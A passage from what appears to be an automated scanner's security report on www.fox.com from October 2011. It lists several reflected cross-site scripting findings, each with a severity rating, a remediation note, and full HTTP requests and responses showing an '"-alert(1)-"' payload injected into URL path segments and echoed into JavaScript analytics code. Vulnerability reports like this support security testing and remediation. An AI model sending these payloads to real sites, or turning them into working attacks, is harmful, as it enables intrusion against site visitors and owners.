Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 22235
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ugcb5520"-alert(1)-"c507a22771b:xmlhomepage_ep_2011-10-02"
s_analytics.hier1="fox:shows:_ugcb5520"-alert(1)-"c507a22771b:xmlhomepage_ep_2011-10-02" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ugcb5520"-a
...[SNIP]...

2.169. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-02.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ugc/xml/homepage_ep_2011-10-02.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f71f"-alert(1)-"b7a430e1a5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ugc/xml8f71f"-alert(1)-"b7a430e1a5c/homepage_ep_2011-10-02.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.107
Content-Type: text/html; charset=utf-8
Content-Length: 22207
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ugc:xml8f71f"-alert(1)-"b7a430e1a5chomepage_ep_2011-10-02"
s_analytics.hier1="fox:shows:_ugc:xml8f71f"-alert(1)-"b7a430e1a5chomepage_ep_2011-10-02" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ugc:xml8f71f"-a
...[SNIP]...

2.170. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-2.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ugc/xml/homepage_ep_2011-10-2.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54d72"-alert(1)-"8631be47365 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ugc54d72"-alert(1)-"8631be47365/xml/homepage_ep_2011-10-2.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.118
Content-Type: text/html; charset=utf-8
Content-Length: 22230
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ugc54d72"-alert(1)-"8631be47365:xmlhomepage_ep_2011-10-2"
s_analytics.hier1="fox:shows:_ugc54d72"-alert(1)-"8631be47365:xmlhomepage_ep_2011-10-2" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ugc54d72"-ale
...[SNIP]...

2.171. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-2.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ugc/xml/homepage_ep_2011-10-2.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6083f"-alert(1)-"36848e2e2e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ugc/xml6083f"-alert(1)-"36848e2e2e5/homepage_ep_2011-10-2.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.107
Content-Type: text/html; charset=utf-8
Content-Length: 22202
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ugc:xml6083f"-alert(1)-"36848e2e2e5homepage_ep_2011-10-2"
s_analytics.hier1="fox:shows:_ugc:xml6083f"-alert(1)-"36848e2e2e5homepage_ep_2011-10-2" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ugc:xml6083f"-ale
...[SNIP]...

2.172. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-2.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ugc/xml/homepage_ep_2011-10-2.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b21"-alert(1)-"020a48b7a0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ugc/xml/homepage_ep_2011-10-2.xml26b21"-alert(1)-"020a48b7a0a HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.106
Content-Type: text/html; charset=utf-8
Content-Length: 22090
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
s" //Site Section
s_analytics.prop7="fox:shows:_ugc" //Site Sub - Section
s_analytics.prop8="fox:shows:_ugc:xm" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ugc:xmlhomepage_ep_2011-10-2.xml26b21"-alert(1)-"020a48b7a0a"
s_analytics.prop15="sub section:homepage_ep_2011-10-2" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_a
...[SNIP]...

2.173. http://www.fox.com/_ui/css/combinedcss.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/css/combinedcss.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6c71"-alert(1)-"0a41ec00552 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uie6c71"-alert(1)-"0a41ec00552/css/combinedcss.php?page=fox.homepage HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.114
Content-Type: text/html; charset=utf-8
Content-Length: 22174
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:02 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uie6c71"-alert(1)-"0a41ec00552:csscombinedcss"
s_analytics.hier1="fox:shows:_uie6c71"-alert(1)-"0a41ec00552:csscombinedcss" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uie6c71"-alert(1)-"0a41ec00552:css
...[SNIP]...

2.174. http://www.fox.com/_ui/css/combinedcss.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/css/combinedcss.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd487"-alert(1)-"eaa6166238c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/cssdd487"-alert(1)-"eaa6166238c/combinedcss.php?page=fox.homepage HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 22146
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:cssdd487"-alert(1)-"eaa6166238ccombinedcss"
s_analytics.hier1="fox:shows:_ui:cssdd487"-alert(1)-"eaa6166238ccombinedcss" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:cssdd487"-alert(1)-"eaa6166238ccomb
...[SNIP]...

2.175. http://www.fox.com/_ui/flash/EditorialPod.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/flash/EditorialPod.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29019"-alert(1)-"b8f967f530a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui29019"-alert(1)-"b8f967f530a/flash/EditorialPod.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.114
Content-Type: text/html; charset=utf-8
Content-Length: 22189
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:23 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui29019"-alert(1)-"b8f967f530a:flasheditorialpod"
s_analytics.hier1="fox:shows:_ui29019"-alert(1)-"b8f967f530a:flasheditorialpod" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui29019"-alert(1)-"b8f967f53
...[SNIP]...

2.176. http://www.fox.com/_ui/flash/EditorialPod.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/flash/EditorialPod.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7b3a"-alert(1)-"eaf96df47c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/flashc7b3a"-alert(1)-"eaf96df47c1/EditorialPod.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 22161
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:26 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:flashc7b3a"-alert(1)-"eaf96df47c1editorialpod"
s_analytics.hier1="fox:shows:_ui:flashc7b3a"-alert(1)-"eaf96df47c1editorialpod" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:flashc7b3a"-alert(1)-"eaf96df47
...[SNIP]...

2.177. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa8ab"-alert(1)-"8b32fbdd5c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uiaa8ab"-alert(1)-"8b32fbdd5c9/fox_player/swf/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.107
Content-Type: text/html; charset=utf-8
Content-Length: 22237
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uiaa8ab"-alert(1)-"8b32fbdd5c9:fox_playerfoxanalyticsextension"
s_analytics.hier1="fox:shows:_uiaa8ab"-alert(1)-"8b32fbdd5c9:fox_playerfoxanalyticsextension" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_
...[SNIP]...

2.178. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44e20"-alert(1)-"0b1a5a5f8f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player44e20"-alert(1)-"0b1a5a5f8f5/swf/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.103
Content-Type: text/html; charset=utf-8
Content-Length: 22209
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:11 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player44e20"-alert(1)-"0b1a5a5f8f5foxanalyticsextension"
s_analytics.hier1="fox:shows:_ui:fox_player44e20"-alert(1)-"0b1a5a5f8f5foxanalyticsextension" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_play
...[SNIP]...

2.179. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edc0e"-alert(1)-"82188488666 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swfedc0e"-alert(1)-"82188488666/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.108
Content-Type: text/html; charset=utf-8
Content-Length: 22097
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:15 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfedc0e"-alert(1)-"82188488666"
s_analytics.prop15="sub section:foxanalyticsextension" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_a
...[SNIP]...

2.180. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c7a"-alert(1)-"06df9c9be7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui80c7a"-alert(1)-"06df9c9be7a/fox_player/swf/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
